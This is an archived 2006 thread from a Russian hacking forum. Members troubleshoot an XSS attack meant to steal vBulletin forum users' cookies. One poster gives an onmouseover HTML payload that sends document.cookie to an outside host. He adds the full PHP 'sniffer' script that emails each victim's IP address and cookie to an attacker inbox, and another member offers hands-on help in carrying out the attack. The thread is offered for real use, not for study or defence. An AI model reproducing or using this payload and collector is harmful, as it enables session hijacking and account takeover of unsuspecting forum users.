HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.05.2006, 16:29
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
На форуме хтмл код включен.Что можно сделать?
В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил
 
Ответить с цитированием

  #2  
Старый 20.05.2006, 15:24
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Цитата:
Сообщение от Зверь  
да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
На форуме хтмл код включен.Что можно сделать?
В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил
дай адрес форумa - лп
 
Ответить с цитированием

  #3  
Старый 20.05.2006, 03:41
nix
Banned
Регистрация: 07.05.2006
Сообщений: 36
Провел на форуме:
96196

Репутация: -9
По умолчанию

ГЫгы, это спотря какой снифер у тебя
 
Ответить с цитированием

  #4  
Старый 20.05.2006, 14:44
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

Снифер из той же статья,настройка там всего одна,адрес почты
 
Ответить с цитированием

  #5  
Старый 20.05.2006, 15:46
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

liauliau-наисал в ЛП
 
Ответить с цитированием

  #6  
Старый 20.05.2006, 19:05
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Цитата:
Сообщение от Зверь  
liauliau-наисал в ЛП

HTML код Выкл.
 
Ответить с цитированием

  #7  
Старый 20.05.2006, 19:17
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

да включен там код хтмл,но не для всех,а толко для определеных групп...
Подскажи почему на сниф ничего неприходит?
 
Ответить с цитированием

  #8  
Старый 20.05.2006, 19:21
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

Вот посмотри что неправильно в моих дейсивиях
1-Залил на сайт эксплоит с такими данными
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "shport-maksim@yandex.ru";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
2-на форуме просто в новом сообщении написал вот это
<pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
Что не ТАК?
 
Ответить с цитированием

  #9  
Старый 20.05.2006, 19:23
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

liauliau-помоги пожалуйста.
У тебя есть аська?
 
Ответить с цитированием

  #10  
Старый 20.05.2006, 19:37
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Цитата:
Сообщение от Зверь  
liauliau-помоги пожалуйста.
У тебя есть аська?
не знаю что ты там делаешь ? дай форум где включен код хтмл я тебе зделаю видео
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.5.4 micle Уязвимости CMS / форумов 3 15.04.2006 23:47
Уязвимости форумов phpbb 2.0.15 exbbxak Уязвимости CMS / форумов 105 10.08.2005 20:19
Действующие уязвимости почтовых систем РФ Maxmen Уязвимости Mail-сервис 16 12.12.2004 16:48
Уязвимости Vbulletin и здешний форум Монгол Уязвимости CMS / форумов 6 03.12.2004 15:27
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ